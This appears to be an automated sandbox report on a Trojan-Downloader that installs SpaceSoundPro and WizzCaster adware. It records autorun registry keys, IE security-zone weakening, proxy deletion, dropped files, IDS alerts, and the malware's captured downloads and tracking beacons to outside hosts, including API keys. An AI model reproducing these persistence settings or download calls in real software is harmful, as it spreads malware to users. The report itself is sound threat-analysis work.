[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"osmsg" = "%Documents and Settings%\All Users\Application Data\WindowsMsg\osmsg.exe /AUTORUN"

The Trojan-Downloader deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\osmsg\DEBUG]
"Trace Level"

The process regsvr32.exe:508 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 0B 07 68 E9 34 69 A3 4D 68 A4 FB 21 D5 E8 94"

The process hp.exe:2404 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

The process nst25.tmp:3184 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 61 5D 00 6F F1 9B 0B 5F 29 DB AA D2 B0 B3 CC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsq6.tmp:1492 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"UninstallString" = "%Program Files%\SpaceSoundPro\UninstallerCaster.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SpaceSoundPro]
"idscservice.exe" = "TGo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayName" = "Caster"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpaceSoundPro]
"UninstallString" = "%Program Files%\SpaceSoundPro\uninstaller.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"Publisher" = "Caster"

[HKCU\Software\Microsoft\idsc]
"partner" = "CMI3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d35e5e88-e5b8-447f-b6f4-66bc7aa638d1}]
"DisplayVersion" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\idsc]
"channel" = "3"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SpaceSoundPro]
"wizzcaster.exe" = "BShyah"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 AC 4E 59 DA 86 21 28 AA BA 12 07 84 52 2B BA"

[HKCU\Software\Microsoft\idsc]
"Product" = "spacesoundpro"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"HY2F7WRL5V.exe" = "HY2F7WRL5V"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To run itself automatically each time Windows is booted, the Trojan-Downloader adds the following link to its file in the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Caster" = "%Program Files%\SpaceSoundPro\wizzcaster.exe"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The process mofcomp.exe:2556 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 9E 6E 0A 90 D0 56 66 5B B7 17 CA C4 0B 35 21"

The process nst18.tmp:2976 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 9E 1D BD 06 EF 59 0E 2C CD 55 B1 51 61 C9 3E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes that have no dots in their names and do not belong to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tiantianwifi.exe:2436 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\tiantianwifi\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 73 DB 5E 0A 6C 5D FA 93 C3 CF 88 5E 6C 22 AF"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\tiantianwifi\DEBUG]
"Trace Level"

Dropped PE files

MD5 File path
122ae907c9811b0779165a7030449eb2 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\Uninstall.exe
542199ec8faa7cb170b8f663d62ada99 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\A7914D56-1466442363-ADB2-5C02-3742FA8A8B37\qnsm13.tmp
e5a3f3c89679531733cba0e70029af92 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\51MTCANOTX\testversion.exe
3cc05dff26967dcca22bbca93d47ea83 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\51MTCANOTX\win.exe
6ba946cf089d44db5cb918b45cf0daf1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HY2F7WRL5V.exe
bfe060c22b44914e05d3f5367de6c9fe c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd9.tmp\NSISpcre.dll
f02155fa3e59a8fc48a74a236b2bb42e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsi2.tmp\inetc.dll
3fdbfc57c03c91b672af530efe849cb3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsjB.tmp
e3a15c2db8e518055399276d7d6dcebf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsq6.tmp
3fdbfc57c03c91b672af530efe849cb3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\MZSXQZW1\1znQuZItQ[1]
82fe604393ec07969e6165a4f7583d2e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\Y7QN67Q5\gXvDHtyh[1].exe
1bc7210a802504161b5e4b2dc66d22f1 c:\Program Files\Caster\Uninstaller.exe
eb9b1cbd42d4b64cadaed3378e627676 c:\Program Files\Caster\wizzcaster.exe
416b29d4214d149864d1e7c8f211bdc0 c:\Program Files\SpaceSoundPro\SpaceSoundPro.dll
3bfe76a9b4b9c341eabb5efabf0b35aa c:\Program Files\SpaceSoundPro\SpaceSoundPro.exe
96a486590aefaacc16275d840c18ea55 c:\Program Files\SpaceSoundPro\Uninstall.exe
1bc7210a802504161b5e4b2dc66d22f1 c:\Program Files\SpaceSoundPro\UninstallerCaster.exe
c0a634ba34d6b3464cc6384234758da2 c:\Program Files\SpaceSoundPro\idscservice.exe
f77c28265a32fed3b09b9a0ff06a1555 c:\Program Files\SpaceSoundPro\silentconfigurator.exe
5ade09de54d4263dc0691f4d08153a6c c:\Program Files\SpaceSoundPro\silentunconfigurator.exe
ab3efbe2a7b092daea5f33c4e55151e4 c:\Program Files\SpaceSoundPro\uninstaller.exe
eb9b1cbd42d4b64cadaed3378e627676 c:\Program Files\SpaceSoundPro\wizzcaster.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 2502656 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 2695168 2528 2560 3.13013 cc37a2988eb4efb20cdcece32f04e5f5

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 98

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /get/1/spacesoundpro-widget.exe HTTP/1.1
Host: dl.wizzuniquify.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /get/1/spacesoundpro-uninstaller.exe HTTP/1.1
Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:06 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /download/3/wizzcaster.exe HTTP/1.1
Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:07 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /download/3/wizzcasterUninstaller.exe HTTP/1.1
Host: dl.wizzuniquify.com


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:08 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /download/3/WizzCasterInstaller.exe HTTP/1.1
Host: dl.we-want-it.xyz
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:50 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

GET /download/1/wizzrelease.exe HTTP/1.1
Host: dl.we-want-it.xyz


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:52 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Transfer-Encoding: chunked
Content-Type: application/x-msdownload

<<< skipped >>>

POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.csdimonetize.com
Content-Length: 142
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



remote_id=3&user_name=csdi&api_key=azaez-azezae-azeaze-azeaze&buying_product_name=spacesoundpro&buying_partner_name=CMI3&buying_channel_name=3


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:05:40 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=lc72qogqtu04pvn1dav4ivpp03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1108
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


GET /YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: itan.etudios.ru
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Mon, 20 Jun 2016 14:06:10 GMT
Content-Type: application/octet-stream; charset=windows-1251
Content-Length: 5610496
Connection: keep-alive
X-Powered-By: PHP/5.4.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 20 Jun 2016 14:06:10 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="1b2833e4311d.exe"
Content-Transfer-Encoding: binary
Pragma: public

<<< skipped >>>

POST /api/v1/configuration?username=csdi&password=68b07047-1e8d-47ef-8332-09a2c83ad539 HTTP/1.1
Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6IjJwcjdXV0VBWFp1ellvSjA1R2NiTHc9PSIsInZhbHVlIjoiUVwvaFNzSG9FNDJZSkRMdzRKR3BKME9VT2ZlTWNrYU5lUGt4MUMzNTE1eWo3XC85XC9kNnMxYzlwSURvenRtSzNwZWNLR2p6dzV4VHNIc3hPVWdTckNcL3BnPT0iLCJtYWMiOiJhZmUyYmFjMzIwN2QxOTJmYWM3Zjc3YjRmNDJkYzg4Y2U4ZTU2MjJiNTczM2Q4ODM2OTFmMGFkOThkNDhkMDNkIn0=; expires=Mon, 20-Jun-2016 16:06:02 GMT; Max-Age=7200; path=/; httponly
Content-Length: 135
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/json
{"username":"csdi","api_key":"56f25c2b4eced","wizztracki_user_name":"csdi","wizztracki_api_key":"e3b93cef-8bd4-11e5-8538-0cc47a47968c"}



POST /api/v2/ads?user_name=csdi&api_key=56f25c2b4eced&days_after_install=0 HTTP/1.1
Content-Type: text/xml
Host: wizzcaster.com
Content-Length: 0


HTTP/1.1 200 OK
Date: Mon, 20 Jun 2016 14:06:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6IklxMVwvQzlRQlwvcGJCU3JIaUhtdzhJdz09IiwidmFsdWUiOiJ2VFZ6XC9mVkozcWZvY3EyRVA0Ylo0UG02THg1b2V2MGk1b2wxeHA0ekJrMnU3TzZqK2RITnVwekV0ZmZTU0ZMUWc4MXJXZ2EwTndzcHhUcUxNYktHUGc9PSIsIm1hYyI6IjViNDcyM2FkNjNhMzgzMjVjOTgwYmJjNDZhOTc2NDE4NDEyYTg0ZTMxY2YxNzk1MTI1N2MyNGI4NzQyZDQ4MzQifQ==; expires=Mon, 20-Jun-2016 16:06:02 GMT; Max-Age=7200; path=/; httponly
Content-Length: 1210
Content-Type: application/json
{"time_between_prints":"10","print_list":[
{"link":"http:\/\/VVV.adnetworkperformance.com\/a\/display.php?r=1203893","campaign_id":"67","campaign_config_id":"404","max_show_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"},
{"link":"http:\/\/VVV.terraclicks.com\/watch?key=ce879c0c81171a2b08325be280eca96a","campaign_id":"120","campaign_config_id":"402","max_show_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"},
{"link":"http:\/\/VVV.xmediaserve.com\/apu.php?n=&zoneid=14335&cb=INSERT_RANDOM_NUMBER_HERE&popunder=1&direct=1","campaign_id":"68","campaign_config_id":"403","max_show_per_day_per_user":"30","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"},
{"link":"http:\/\/n162adserv.com\/ads?key=0a36c0d49f7b6df6a133b22762c71970&ch=&width=0&height=0","campaign_id":"65","campaign_config_id":"382","max_show_per_day_per_user":"8","max_show_per_day_total":"2147483647","ie":"1","chrome":"1","firefox":"1","start_time":"00:00:00","end_time":"00:00:00"}
]}

<<< skipped >>>

GET /protJS/LDpxFBktGQEVFCwCBhAHSl5XREYHCxMNCQZGXEomBRABLQ8wDSQqOgEqLB4jCUVfRBIWCkpeRAAQEhhdS0kBChINFQgBGm8MEgUqOzoNBWwIEUkjHBUMBRZGFA4YWxMcCjsVBxEUCwJbVVhyUkBafXJxSEkhFg0FDDoCRV5SX1RVWlBSWlJcX1kZ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: latest-404417.onpato.ru
Connection: Keep-Alive


HTTP/1.1 204 No Content
Server: nginx/1.8.1
Date: Mon, 20 Jun 2016 14:05:42 GMT
Content-Type: application/javascript
Connection: keep-alive


GET /8001/ttwifi.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: down.eszju.cn
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Sat, 04 Jun 2016 05:36:25 GMT
Accept-Ranges: bytes
ETag: "a8c1c6823bed11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2016 14:05:55 GMT
Content-Length: 1404030

<<< skipped >>>

POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_start HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:47 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=ubup3l5n78v72v1v1kv1ltqsj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_download_start HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=ho6r24d5jd50rcrl43ap54bfe0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_download_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=2q3l3cuap30jvhrtlc2t259q45; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}



POST /csdi/wizzmonetize/buying_installer_spacesoundpro_CMI3_3_wizzproduct_execute_succeed HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 59
Expect: 100-continue


HTTP/1.1 100 Continue
....



user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c


HTTP/1.1 200 OK

Date: Mon, 20 Jun 2016 14:05:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=n46as2mgr80o05ed0ja2a69k63; path=/
